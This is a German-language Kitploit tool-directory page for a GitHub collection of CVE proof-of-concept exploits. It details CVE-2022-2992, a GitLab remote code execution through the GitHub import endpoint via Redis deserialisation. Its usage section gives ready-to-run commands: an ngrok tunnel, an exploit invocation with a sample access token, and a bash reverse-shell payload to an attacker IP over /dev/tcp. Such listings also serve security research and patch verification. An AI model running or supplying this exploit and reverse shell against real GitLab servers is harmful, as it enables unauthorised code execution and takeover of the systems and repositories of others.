Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVEs — A collection of proof-of-concept exploit scripts written by the team at Redway Security for various CVEs. | Kitploit
Tools/GitHubGitHub/redwaysecurity/cves
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubredwaysecurity/cves

CVEs

A collection of proof-of-concept exploit scripts written by the team at Redway Security for various CVEs.

Repository anzeigen
22vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-2992: Remote-Befehlsausführung über Github-Import

Informationen

Beschreibung: Dies ermöglicht einem authentifizierten Benutzer, über den Import-von-GitHub-API-Endpunkt eine Remote-Codeausführung zu erreichen.
Betroffene Versionen: alle Versionen von 11.10 vor 15.1.6, 15.2 bis 15.2.4, 15.3 bis 15.3.2
Behobene Version: 15.3.2
Forscher: vakzz
Write-up-Link: https://blog.redwaysecurity.com/2023/04/desenvolvendo-o-exploit-para-o-cve-2022.html
NIST-CVE-Link: https://nvd.nist.gov/vuln/detail/CVE-2022-2992

Proof-of-Concept-Exploit

Beschreibung

Ein authentifizierter Benutzer kann ein Repository von Github in Gitlab importieren. Man kann versuchen, von einem Controller-Server des Angreifers zu importieren, der mit einem Redis-Serialisierungsprotokoll-Objekt im verschachtelten default_branch antwortet, wodurch Gitlab dieses Objekt in Redis zwischenspeichert und Redis es deserialisiert und die Ausführung der Payload auslöst.

Verwendung/Ausnutzung

Man benötigt ein persönliches Zugriffstoken

root@kitploit:~
$ bundle install # install dependencies
$ ngrok http 127.0.0.1:4567  # start ngrok tunnel
$ export NGROK_URL=https://68b9-83-173-213-121.eu.ngrok.io # use the url from ngrok
$ ruby exploit.rb http://target.gitlab.com w4dg6wVj7j7xlJgpGLEYdwFe 'bash -c "sh -i >& /dev/tcp/172.23.0.1/1337 0>&1"' # that is a example, use your own payload

Beispiel

Remote-Befehlsausführung über Github-Import

Tool herunterladen